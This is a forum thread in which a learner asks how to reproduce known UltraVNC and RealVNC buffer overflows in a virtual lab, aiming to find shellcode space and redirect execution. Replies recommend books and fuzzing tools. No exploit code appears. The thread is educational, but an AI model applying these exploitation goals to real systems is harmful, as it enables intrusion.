Results 1 to 8 of 8

Thread: Help with fuzzing

  1. #1
    Junior Member
    Join Date
    Nov 2007
    Posts
    37

    Default Help with fuzzing

    I'm trying to learn up on the topic of fuzzing, i'm using vmware workstation for the backtrack 3 & unpatched xp sp1 box. What i'm trying to do is the ultravnc 1.0.1 buffer overflow & the realvnc 3.3.7 buffer overflow. Basically when i set up the exploit on backtrack and then attempt to connect to it from the xp box all that happens is the program crashes in both cases (ultra & real). I attempted to look at the crash in olly debug but to little avail. What i would like to do is to recreate the crash manually, find a place for shellcode, and tell the program to jump to the shellcode. I appreciate any help that your willing to give. I'm basically just trying to recreate the buffer overflow to better understand how it all works. Thanks again for all your help.

  2. #2
    Junior Member
    Join Date
    Nov 2007
    Posts
    37

    Default

    bump......

  3. #3
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Default

    Quote Originally Posted by Tully View Post
    I'm trying to learn up on the topic of fuzzing, i'm using vmware workstation for the backtrack 3 & unpatched xp sp1 box. What i'm trying to do is the ultravnc 1.0.1 buffer overflow & the realvnc 3.3.7 buffer overflow. Basically when i set up the exploit on backtrack and then attempt to connect to it from the xp box all that happens is the program crashes in both cases (ultra & real). I attempted to look at the crash in olly debug but to little avail. What i would like to do is to recreate the crash manually, find a place for shellcode, and tell the program to jump to the shellcode. I appreciate any help that your willing to give. I'm basically just trying to recreate the buffer overflow to better understand how it all works. Thanks again for all your help.
    There's only 1 book that I know of that takes on the topic of fuzzing solely.

    http://www.amazon.com/Fuzzing-Brute-...9505672&sr=8-1

    I have just finished reading this book. Its easy to understand if you have programming background. I can still say that I have a lot more to learn about fuzzing even after reading this book.

    Do you realize that those exploits are most likely Version specific AND Operating system specific? Also do you realize that you must be using ultravnc in order to use the ultravnc exploit as the realvnc exploit will most likely not work?

    Fuzzing is just part of required knowledge in order to properly exploit programs. On top of that you must know what to look for and how to write proper exploits for each program. It is a must to know how to program and have a great understanding of any protocols your target is using. Along with in-memory fuzzing and file fuzzing.

    Notice that it might be possible that the exploits your trying to use have been purposely miscoded in order to keep skiddies from using them at will.

    There is no easy way to learn this so don't ask for it.

  4. #4
    Junior Member
    Join Date
    Nov 2007
    Posts
    37

    Default

    thanks hhmatt81 for your time and input. I'll def give the book a read. And i have an understanding of how buffer overflows work and why, just wanting to further my knowladge on the subject. Thanks again.

  5. #5
    Just burned his ISO
    Join Date
    Apr 2008
    Posts
    18

    Default fuzzing

    Go to google, type in fuzzing pdf, and you will find there is a very large volume of information that is available for viewing.

    It is free, so you won't necessarily have to buy a book from amazon, and you can get it without that wait.

    This is a very useful way to get information on many subjects as google finds pdf files.

    The first search result is interesting, i can't post links yet as I am still a no00ob

  6. #6
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    portable w3af UI GTK !!
    http://rapidshare.com/files/10962865..._w3af.zip.html

    http://fusil.hachoir.org/trac

    WebInspect has a click fuzzer
    http://rmccurdy.com/scripts/videos/r...spect_hack.swf

    webscarab i use sometimes too

    some stuff you may not know about

  7. #7
    Member elazar's Avatar
    Join Date
    Sep 2007
    Posts
    217

    Default

    Quote Originally Posted by hhmatt81 View Post
    There's only 1 book that I know of that takes on the topic of fuzzing solely.

    http://www.amazon.com/Fuzzing-Brute-...9505672&sr=8-1

    I have just finished reading this book. Its easy to understand if you have programming background. I can still say that I have a lot more to learn about fuzzing even after reading this book.

    Do you realize that those exploits are most likely Version specific AND Operating system specific? Also do you realize that you must be using ultravnc in order to use the ultravnc exploit as the realvnc exploit will most likely not work?

    Fuzzing is just part of required knowledge in order to properly exploit programs. On top of that you must know what to look for and how to write proper exploits for each program. It is a must to know how to program and have a great understanding of any protocols your target is using. Along with in-memory fuzzing and file fuzzing.

    Notice that it might be possible that the exploits your trying to use have been purposely miscoded in order to keep skiddies from using them at will.

    There is no easy way to learn this so don't ask for it.
    Though its geared towards *nix, checkout Jon Erickson's Hacking: The Art of Exploitation. http://www.amazon.com/Hacking-Art-Ex.../dp/1593271441
    dd if=/dev/urandom of=/mybrain

  8. #8
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Jon kinda did these in reverse. The first edition was an "advanced" view at elite exploitation techniques using various overflows and network (wired/wireless) protocol/programming flaws. The second edition is a more in-deph view of, for instance, OOD(Object Oriented Design) and language architectures. I'd recommend the first edition if you are looking nito fuzzing, as the techniques shown in the book are exactly what fuzzing looks for.



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •